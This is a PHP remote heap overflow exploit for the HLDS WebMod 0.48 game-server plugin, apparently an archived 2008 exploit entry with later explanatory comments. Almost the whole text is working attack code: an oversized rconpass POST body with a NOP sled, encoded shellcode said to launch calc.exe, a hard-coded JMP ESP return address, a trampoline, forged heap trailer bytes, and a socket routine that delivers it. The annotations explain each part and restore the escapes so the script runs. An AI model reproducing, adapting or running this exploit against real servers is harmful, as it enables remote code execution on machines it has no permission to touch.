
# Title : HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit
# Published : 2008-05-03
# Author : SkOd


<?php
## HLDS WebMod 0.48  (rconpass) Remote Heap Overflow Exploit
## Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew
## shir, skod.uk [at] gmail [dot] com
## 17/12/2007

## Registers (rconpass = "A"x16444):
# EAX 67E04955 w_mm.67E04955
# ECX 41414141
# EDX 41414141
# EBX 0000000A
# ESP 08F650FC
# EBP 08F726D4
# ESI 08F72734
# EDI 00000000
# EIP 67E0498C w_mm.67E0498C
#########


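// 7 == E_ERROR | E_WARNING | E_PARSE: notices stay quiet, hard errors still show.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
// The socket read further down may block for a while; never let PHP kill the run.
ini_set("max_execution_time", 0);

// Target host and port come from the command line; anything else prints usage and stops.
// empty() keeps the original truthiness check (a bare "0" is still rejected) but does
// not raise an undefined-index notice when the arguments are missing altogether.
if (!empty($_SERVER['argv'][1]) && !empty($_SERVER['argv'][2])) {
	$host = $_SERVER['argv'][1];
	$port = $_SERVER['argv'][2];
} else {
	// Line endings are CRLF ("\r\n"); the escape sequences in the published copy had
	// lost their backslashes, so the banner was printing literal "rn".
	echo "\r\nHLDS WebMod 0.48 Remote Heap Overflow Exploit\r\n";
	// \x40 = '@', \x2E = '.' (address obfuscated against scrapers in the original).
	echo "Written by shir, skod.uk\x40gmail\x2Ecom\r\n";
	echo "Usage: php {$_SERVER['argv'][0]} IP PORT\r\n";
	echo "Example: php {$_SERVER['argv'][0]} 192.168.0.100 27015\r\n";
	// Usage error: exit non-zero so a calling shell script can tell it apart from a run.
	exit(1);
}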

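echo "[~] Packing...\r\n";

// Trampoline reached once EIP is redirected: 66 83 C0 04 = add ax,4 ; FF E0 = jmp eax.
// The 0x66 prefix makes the add a 16-bit one on AX, which behaves like ADD EAX,4 as
// long as AX does not wrap (EAX in the register dump above is 0x67E04955, so it won't).
// Every "\x.." escape below had lost its backslash in the published copy; restored.
$scode = "\x66\x83\xC0\x04\xFF\xE0";

// Metasploit-encoded payload that launches calc.exe (160 bytes). The leading bytes
// look like a Metasploit fnstenv/XOR decoder stub followed by the encoded body, but
// only the decoded calc behaviour is vouched for by the header's "Tested on" line.
$shellcode =
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf4".
"\x47\xba\xa4\x83\xeb\xfc\xe2\xf4\x08\xaf\xfe\xa4\xf4\x47\x31\xe1".
"\xc8\xcc\xc6\xa1\x8c\x46\x55\x2f\xbb\x5f\x31\xfb\xd4\x46\x51\xed".
"\x7f\x73\x31\xa5\x1a\x76\x7a\x3d\x58\xc3\x7a\xd0\xf3\x86\x70\xa9".
"\xf5\x85\x51\x50\xcf\x13\x9e\xa0\x81\xa2\x31\xfb\xd0\x46\x51\xc2".
"\x7f\x4b\xf1\x2f\xab\x5b\xbb\x4f\x7f\x5b\x31\xa5\x1f\xce\xe6\x80".
"\xf0\x84\x8b\x64\x90\xcc\xfa\x94\x71\x87\xc2\xa8\x7f\x07\xb6\x2f".
"\x84\x5b\x17\x2f\x9c\x4f\x51\xad\x7f\xc7\x0a\xa4\xf4\x47\x31\xcc".
"\xc8\x18\x8b\x52\x94\x11\x33\x5c\x77\x87\xc1\xf4\x9c\xb7\x30\xa0".
"\xab\x2f\x22\x5a\x7e\x49\xed\x5b\x13\x24\xdb\xc8\x97\x47\xba\xa4";

// Layout of the rconpass value, 16444 characters in total (the same length as the
// "A"x16444 run in the register dump above):
//   [100 NOPs][shellcode][NOPs to offset 16256][JMP ESP][NOPs][trampoline][NOPs][trailer]
$evilcode  = str_repeat("\x90", 100);
$evilcode .= $shellcode;
// Pad so that the return-address slot lands exactly at offset 16256.
$evilcode .= str_repeat("\x90", 16156 - strlen($shellcode));

// 0x076AAFFD: FF E4 (JMP ESP) inside cstrike\dlls\mp.dll (the path in the original
// comment had lost its backslashes). This is build-specific: any other mp.dll needs
// the gadget located again.
$evilcode .= "\xFD\xAF\x6A\x07";

$evilcode .= str_repeat("\x90", 60 - strlen($scode));
$evilcode .= $scode;
$evilcode .= str_repeat("\x90", 8);

// Trailer: ASCII '0' filler around a pointer to 0x7FFDF020, which the original author
// labels the PEB lock pointer (XP PEB base 0x7FFDF000 + 0x20). NUL bytes are sent
// percent-encoded ("%00") so they survive the form body; assuming the server decodes
// them, the value is 16420 bytes on the heap, not 16444. The exact layout presumably
// forges heap metadata so that the overwrite lands on that pointer — verify in a
// debugger before relying on it. Note the rest of the value is sent raw: it contains
// 0x3D ('=') and 0x20 (' '), so this relies on a lenient form parser — confirm.
$evilcode .= str_repeat("0", 72);
$evilcode .= str_repeat("%00", 4);
$evilcode .= str_repeat("0", 4);
$evilcode .= "\x20\xF0\xFD\x7F"; # 0x7FFDF020, "Windows PEB Lock Pointer" per the original
$evilcode .= str_repeat("%00", 8);

$post = "rconpass=" . $evilcode . "&setcookiesNULL=rconpass";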

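// Hand-built HTTP/1.1 POST. Line endings must be CRLF ("\r\n"); the published copy
// had lost the backslashes and would have sent literal "rn", which no HTTP parser
// accepts as a line break. Content-Length is byte-based and strlen() is byte-wise,
// so it matches the body exactly (the "%00" sequences count as 3 bytes each on the wire).
$pack  = "POST /auth.w?redir= HTTP/1.1\r\n";
$pack .= "Host: {$host}:{$port}\r\n";
$pack .= "User-Agent: Mozilla/5.0\r\n";
$pack .= "Accept: */*\r\n";
$pack .= "Accept-Language: en-us,en;q=0.5\r\n";
$pack .= "Accept-Encoding: gzip,deflate\r\n";
$pack .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$pack .= "Keep-Alive: 300\r\n";
$pack .= "Connection: keep-alive\r\n";
$pack .= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack .= "Content-Length: " . strlen($post) . "\r\n\r\n" . $post;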

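echo "[~] Sending...\r\n";

// One shot: connect, push the request, and peek at the first line of the reply.
// Checking the handle itself (not just $errstr) means a failed connect can never
// fall through to fwrite() on `false`. The success heuristic is the original one
// and is weak: a reply containing '<' (HTML came back, the server is still serving)
// is reported as failure, while an empty or timed-out read is reported as success.
$sock = @fsockopen($host, $port, $errno, $errstr, 10);
if ($sock === false) {
	echo "[-] Can't connect {$host}:{$port} ({$errstr})\r\n";
} else {
	fwrite($sock, $pack);
	$reply = fgets($sock, 1024);
	if ($reply !== false && strstr($reply, '<')) {
		// "Try again" presumably reflects the hard-coded PEB address (0x7FFDF020)
		// not being stable across runs on the tested XP SP2 box — unverified here.
		echo "[-] Failed, you better try again.\r\n";
	} else {
		echo "[+] Shellcode should be executed.\r\n";
	}
	fclose($sock);
}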
?> 
